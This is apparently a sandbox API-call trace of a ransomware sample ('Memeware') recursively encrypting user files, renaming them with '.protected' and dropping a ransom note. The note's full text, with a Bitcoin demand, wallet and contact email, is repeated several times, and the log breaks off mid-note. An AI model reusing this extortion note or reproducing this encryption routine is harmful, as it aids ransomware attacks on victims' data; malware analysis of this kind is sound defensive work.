wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\RESTORE_FILES.txt") returned 96 [0084.729] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.730] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.730] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0084.731] lstrlenA (lpString="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") returned 684 [0084.731] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.731] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.731] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0084.731] CloseHandle (hObject=0x14c) returned 1 [0084.732] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0084.732] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0084.732] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\RESTORE_FILES.txt") returned 87 [0084.732] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0084.732] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.732] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0084.733] lstrlenA (lpString="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") returned 684 [0084.733] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0084.733] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.733] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0084.733] CloseHandle (hObject=0xd8) returned 1 [0084.734] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.734] lstrcmpiW (lpString1="FORMS", lpString2="Windows") returned -1 [0084.734] lstrcmpiW (lpString1="FORMS", lpString2="Program Files") returned -1 [0084.734] lstrcmpiW (lpString1="FORMS", lpString2="Program Files (x86)") returned -1 [0084.734] lstrcmpiW (lpString1="FORMS", lpString2="$Recycle.bin") returned 1 [0084.734] lstrcmpiW (lpString1="FORMS", lpString2="System Volume Information") returned -1 [0084.734] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS") returned 63 [0084.734] lstrcmpW (lpString1="FORMS", lpString2=".") returned 1 [0084.734] lstrcmpW (lpString1="FORMS", lpString2="..") returned 1 [0084.734] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\*") returned 65 [0084.734] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0084.734] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.734] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.734] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.734] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.734] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.734] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\.") returned 65 [0084.734] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.734] FindNextFileW (in: hFindFile=0x47ba50, 
lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.735] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.735] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.735] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.735] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.735] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.735] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\..") returned 66 [0084.735] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.735] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.735] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.735] lstrcmpiW (lpString1="FRMCACHE.DAT", lpString2="Windows") returned -1 [0084.735] lstrcmpiW (lpString1="FRMCACHE.DAT", lpString2="Program Files") returned -1 [0084.735] lstrcmpiW (lpString1="FRMCACHE.DAT", lpString2="Program Files (x86)") returned -1 [0084.735] lstrcmpiW (lpString1="FRMCACHE.DAT", lpString2="$Recycle.bin") returned 1 [0084.735] lstrcmpiW (lpString1="FRMCACHE.DAT", lpString2="System Volume Information") returned -1 [0084.735] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT") returned 76 [0084.735] StrStrIW (lpFirst="FRMCACHE.DAT", lpSrch=".protected") returned 0x0 [0084.735] lstrcmpW (lpString1="FRMCACHE.DAT", lpString2="RESTORE_FILES.txt") returned -1 [0084.735] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.735] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
pdwDataLen=0x295ea04*=0x30) returned 1 [0084.735] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\forms\\frmcache.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.735] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT") returned 76 [0084.735] StrStrW (lpFirst="FRMCACHE.DAT", lpSrch=".txt") returned 0x0 [0084.735] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT") returned 76 [0084.735] StrStrW (lpFirst="FRMCACHE.DAT", lpSrch=".rar") returned 0x0 [0084.735] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT") returned 76 [0084.736] StrStrW (lpFirst="FRMCACHE.DAT", lpSrch=".zip") returned 0x0 [0084.736] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.751] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.751] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.752] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.752] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, 
lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0084.753] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0084.753] CloseHandle (hObject=0x14c) returned 1 [0084.753] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT.protected") returned 86 [0084.753] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\forms\\frmcache.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\forms\\frmcache.dat.protected")) returned 1 [0084.754] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0084.754] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0084.754] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\RESTORE_FILES.txt") returned 81 [0084.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\forms\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0084.755] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.755] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0084.755] lstrlenA (lpString="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") returned 684 [0084.756] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0084.756] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.756] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0084.756] CloseHandle (hObject=0xd8) returned 1 [0084.756] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.756] lstrcmpiW (lpString1="IME12", lpString2="Windows") returned -1 [0084.756] lstrcmpiW (lpString1="IME12", lpString2="Program Files") returned -1 [0084.756] lstrcmpiW (lpString1="IME12", lpString2="Program Files (x86)") returned -1 [0084.756] lstrcmpiW (lpString1="IME12", lpString2="$Recycle.bin") returned 1 [0084.756] lstrcmpiW (lpString1="IME12", lpString2="System Volume Information") returned -1 [0084.756] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12") returned 63 [0084.756] lstrcmpW (lpString1="IME12", lpString2=".") returned 1 [0084.756] lstrcmpW (lpString1="IME12", lpString2="..") returned 1 [0084.756] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12\\*") returned 65 [0084.756] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0084.757] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.757] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.757] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.757] lstrcmpiW (lpString1=".", 
lpString2="$Recycle.bin") returned 1 [0084.757] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.757] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12\\.") returned 65 [0084.757] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.757] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.757] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.757] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.757] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.757] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.757] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.757] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12\\..") returned 66 [0084.757] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.757] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.757] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0084.757] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0084.757] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12\\RESTORE_FILES.txt") returned 81 [0084.757] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\ime12\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0084.758] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.758] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0084.759] lstrlenA (lpString="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") returned 684 [0084.759] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) 
returned 1 [0084.759] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.759] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0084.759] CloseHandle (hObject=0xd8) returned 1 [0084.759] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.759] lstrcmpiW (lpString1="IMJP12", lpString2="Windows") returned -1 [0084.759] lstrcmpiW (lpString1="IMJP12", lpString2="Program Files") returned -1 [0084.759] lstrcmpiW (lpString1="IMJP12", lpString2="Program Files (x86)") returned -1 [0084.759] lstrcmpiW (lpString1="IMJP12", lpString2="$Recycle.bin") returned 1 [0084.759] lstrcmpiW (lpString1="IMJP12", lpString2="System Volume Information") returned -1 [0084.759] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12") returned 64 [0084.759] lstrcmpW (lpString1="IMJP12", lpString2=".") returned 1 [0084.759] lstrcmpW (lpString1="IMJP12", lpString2="..") returned 1 [0084.759] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12\\*") returned 66 [0084.759] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0084.760] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.760] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.760] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.760] 
lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.760] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.760] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12\\.") returned 66 [0084.760] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.760] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.760] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.760] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.760] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.760] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.761] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.761] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12\\..") returned 67 [0084.761] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.761] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.761] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0084.761] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0084.761] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12\\RESTORE_FILES.txt") returned 82 [0084.761] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\imjp12\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0xd8 [0084.761] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure 